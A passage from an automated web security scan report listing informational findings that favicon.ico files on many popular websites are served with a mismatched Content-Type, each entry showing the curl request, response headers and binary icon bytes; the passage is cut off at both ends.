The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.astrology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 21:10:14 GMT
Content-Length: 1150
Cache-Control: max-age=2056
Expires: Sat, 02 Apr 2011 14:20:01 GMT
Date: Sat, 02 Apr 2011 13:45:45 GMT
Connection: close

............ .h.......(....... ..... ..........................I..h...h...h....K..........................i...h...h...h....P......h...h...h...j...........................h...h...h...h...........h...h.
...[SNIP]...
27.23. http://www.autozone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autozone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autozone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:04 GMT
Server: Apache
Last-Modified: Wed, 04 Mar 2009 22:09:57 GMT
Accept-Ranges: bytes
Content-Length: 3262
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_bvupapof.dpn=e795366b3660;Version=1;path=/

...... ..............(... ...@.........................................................................................................................................................................
...[SNIP]...
27.24. http://www.avast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.avast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.avast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "544016114"
Last-Modified: Wed, 05 May 2010 08:20:54 GMT
Content-Length: 2550
Date: Sat, 02 Apr 2011 13:38:01 GMT
Server: httpd

..............h...&......... .h.......(....... ............................................ ...(...*....... ..."...$...+..."...%...&...(...)...-...>...C..8O..;W..=X..\o...0...;...?...>..    F...H...[...S
...[SNIP]...
27.25. http://www.babelgum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.babelgum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babelgum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
ETag: "d6d83f-47e-4942acc6bd980"
Server: Apache/2.2.16
Age: 43455
Date: Sat, 02 Apr 2011 13:41:18 GMT
Last-Modified: Wed, 03 Nov 2010 19:10:46 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... ................................................F....h...j..........F...................................B].....o...u..............v.U......D......................
...[SNIP]...
27.26. http://www.bankofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bankofamerica.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bankofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:42:47 GMT
Content-length: 1406
Content-type: text/plain
Last-modified: Thu, 01 Aug 2002 16:37:18 GMT
Etag: "57e-3d4963be"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

..............h.......(....... ...........@...............................................................................................................k...H...%............z...b...Js..2P...........
...[SNIP]...
27.27. http://www.beezid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.beezid.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beezid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 27 Oct 2009 18:54:28 GMT
ETag: "b0857e-37e-476ef35294100"
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Server: Apache
Date: Sat, 02 Apr 2011 14:02:47 GMT
Connection: keep-alive

..............h.......(....... ..................................j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]j.]...j.]>p7.K..J..J..J..J..J..P.1c$/b"/b"1c$.O.>q7j.]j.]........................%c.1i!5l'.T.n.a
...[SNIP]...
27.28. http://www.blucigs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blucigs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blucigs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 17 Nov 2010 18:34:18 GMT
ETag: "47e-49543ebc8de80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:56:52 GMT
Vary: Accept-Encoding,User-Agent
BCWEB-Cluster: BLUWEB02
Content-Type: text/plain

............ .h.......(....... ..... ................................................J....-C..:X.........<..................................."....A`..*>..Wx..Hi..%,..\{.....e..........................
...[SNIP]...
27.29. http://www.blurtit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blurtit.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blurtit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 30 Sep 2009 09:46:35 GMT
ETag: "168f3f-57e-474c8680ff4c0"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .................................'...'...)...,...-......./...0...1...2...3...4...4...5...6...7...=...D...E...E...J...K...Q...T...U...X...Z...]...a...c...d...d...h...p...
...[SNIP]...
27.30. http://www.boingboing.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.boingboing.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boingboing.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:46 GMT
Server: Apache/2.2
Last-Modified: Sat, 10 Nov 2001 21:51:13 GMT
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
27.31. http://www.bravotv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravotv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 2154978050
Content-Type: text/plain; charset=UTF-8
static: true
Varnish-X-Cache: MISS
ETag: "1f70018-e36-48d66ec91c780"
Last-Modified: Mon, 09 Aug 2010 16:58:22 GMT
Content-Length: 3638
Cache-Control: max-age=246
Date: Sat, 02 Apr 2011 13:40:11 GMT
Connection: close

..............h...&... ..............(....... ...........@.............................1.BAE.....sg+...5.! ".PI(...3.../.f\)..z-...4...2.~p,... .A@B.!.%.......". .!. .$.A@D.BAC..... .#.! $.....OH(...
...[SNIP]...
27.32. http://www.breitbart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.breitbart.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.breitbart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:44:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 24 Jan 2009 22:53:57 GMT
Accept-Ranges: bytes
Content-Length: 894
X-Server-Processing-Time: D=191 microseconds
Content-Type: text/plain; charset=UTF-8
Age: 4
X-Cache: HIT from ch-sv-bb2.ha-hosting.com
Connection: keep-alive

..............h.......(....... ....................................................]..\..~..................................#...v..r..r..v. ..y.......................;...v.    x.>..n..o..@..
y..u.7.....
...[SNIP]...
27.33. http://www.buzzillions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzzillions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:29 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Wed, 22 Sep 2010 23:48:40 GMT
ETag: "13e"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .......................................#...X...\...................+...r..............................@7wwwwwws.w9ww.wx.w=7s.wq.w....wq.wu..Wwq.w{...wq.w....wq.......q.;
...[SNIP]...
27.34. http://www.cabelas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabelas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 13 May 2010 15:41:30 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=604800
Date: Sat, 02 Apr 2011 13:32:03 GMT
Connection: close

..............h.......(....... ...............................


."n...N..&....Zn.&Z..2...F...JVF.....FZ".VrJ.:N..."*.:...Fb*.F...Bvj.Vf6.&.......>...>Z..*J.."...f...6R
.J...VjB.6:*.RrZ.B....."..~..6.
...[SNIP]...
27.35. http://www.caringbridge.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.caringbridge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:05 GMT
Server: Apache
Last-Modified: Tue, 06 Jul 2010 23:34:06 GMT
ETag: "329395-37e-48ac07d37b780"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:44:05 GMT
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ......................................................................................im.7<.EK.=D.:?.......27.?E.=C.=B.............dh.QV...................NS..........=C
...[SNIP]...
27.36. http://www.cbc.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cbc.ca
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cbc.ca
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 16 Dec 2010 17:13:52 GMT
ETag: "39588a60-37e-2d87d400"
X-Origin-Server: web12:sb10
Content-Type: text/plain
Cache-Control: public, max-age=27700704
Expires: Fri, 17 Feb 2012 04:38:26 GMT
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 894
Connection: close

..............h.......(....... .................................................0..0..0................................................................................0........1..1..1........0........
...[SNIP]...
27.37. http://www.celebrity-gossip.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebrity-gossip.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebrity-gossip.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 23 Mar 2010 18:00:05 GMT
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 3638
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:45:09 GMT
X-Varnish: 2210099491 2210074179
Age: 111
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 12

..............h...&... ..............(....... ...........@...........................I..>$\..j.._7.......X..O.u..    ..pA..0.G..R..._..(.:.G)h.h<..W2......c..wE...!..T...M..9!T..^..,.A.K,o.S0{.c9..[5
...[SNIP]...
27.38. http://www.census.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.census.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.census.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:46 GMT
Server: Apache
Last-Modified: Fri, 14 May 1999 15:49:16 GMT
ETag: "6e435e-13e-34ad372e07700"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain

..............(.......(....... ........................................................................................................DDDDDDD..D@.D.D..DDLDD....O..D.D.O..D.DDO....DDO..D.DDO....
...[SNIP]...
27.39. http://www.chilisemailclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chilisemailclub.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chilisemailclub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:02 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:51:39 GMT
ETag: "1c60f78-e36-496d90263b0c0"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 05:01:02 GMT
P3P: CP="CURa ADMa DEVa IVAa IVDa CONa OUR IND DSP NON COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................RJ..c.R.........1R......JZ..!.......!1R.......{.RZJ.sk..)1..ss....Z.....!1).11..{.s.........)!..BBs.sk...!s.......
...[SNIP]...
27.40. http://www.chuckecheese.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chuckecheese.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chuckecheese.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 13 Jun 2007 21:11:56 GMT
ETag: "5787b0-e36-105d9f00"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................ca..B.J.........9....$k.....B.9...{.9m..Z.{.........JIB..Q..kq..k]c.B.....).....c.R.s.......BIk.....c...B]..sQ..9.
...[SNIP]...
27.41. http://www.cincinnati.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cincinnati.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cincinnati.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:51 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 16:20:05 GMT
ETag: "1081dc3-37e-d717740"
Accept-Ranges: bytes
Content-Length: 894
Wx: D=2020 t=1301752251045558 w=1
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................9..9..9..9..8..4..0../..5..8..9..9..4..5..9..9..9..9..:    .4..5..V,.kG.jF.Q&.2..6..7..M".L .7..9..9..9..4..F....................4..K........
...[SNIP]...
27.42. http://www.city-data.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.city-data.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.city-data.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:10 GMT
Server: Apache
Last-Modified: Tue, 13 Dec 2005 06:00:00 GMT
ETag: "35200fd-37e-407c78fd79800"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... ...............................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@7..@@@@@@
...[SNIP]...
27.43. http://www.clocklink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clocklink.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clocklink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 18 Mar 2011 13:56:50 GMT
ETag: "1588b7a-57e-49ec22648ec80"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................\..pA.......w...........i..........zN..........f3...............................................................................
...[SNIP]...
27.44. http://www.clubpenguin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clubpenguin.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clubpenguin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Apr 2008 15:52:20 GMT
ETag: "1fd83-47e-44aeb62ab3500"
Accept-Ranges: bytes
Content-Length: 1150
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding

............ .h.......(....... ..... ..........................b...b...................................b...b...O...b...Q..}C...b...b....?.................(....j.._....b...b...[...b...b...U...b...b...b
...[SNIP]...
27.45. http://www.cnsnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnsnews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cnsnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45
Date: Sat, 02 Apr 2011 14:14:49 GMT
X-Varnish: 520445856
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

The requested file favicon.ico was not found.
27.46. http://www.collegeboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegeboard.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeboard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:01 GMT
Server: Apache
Last-Modified: Tue, 16 Oct 2007 12:02:56 GMT
ETag: "37e-43c9af726fc00"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .................................!..!..,.......!..H..`..H........................[.................r.............................,.....!..&................[.........
...[SNIP]...
27.47. http://www.collegeconfidential.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegeconfidential.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 18 Oct 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:57:54 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
27.48. http://www.comedycentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.comedycentral.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.comedycentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 15086
Content-Type: text/plain
Last-Modified: Tue, 21 Dec 2010 17:24:43 GMT
ETag: "3aee-4d10e2db"
Accept-Ranges: bytes
Cache-Control: max-age=6560
Expires: Sat, 02 Apr 2011 15:26:23 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%............................................................................................................................
...[SNIP]...
27.49. http://www.complaintsboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.complaintsboard.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.complaintsboard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 21:28:40 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Oct 2010 03:11:28 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .............................................................................................;D..O\..aq..t.......................v...ct..P]..>H..,2......dg..r...z.
...[SNIP]...
27.50. http://www.contactmusic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.contactmusic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.contactmusic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 18 Feb 2010 16:20:35 GMT
ETag: "1401f79-57e-47fe258bd9ac0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=604800
Age: 0
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: Keep-Alive
Content-Length: 1406

..............h.......(....... ...........@.................................j.........==D.....XK..............^aM.......d.....++7.    .......eee..............q.JJH.....eW......SUR...........s...z.::8...
...[SNIP]...
27.51. http://www.craigslist.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craigslist.ca
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.ca
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Fri, 10 Dec 2010 20:14:23 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Mon, 07 Dec 2020 20:14:23 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...
27.52. http://www.craigslist.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craigslist.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslist.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
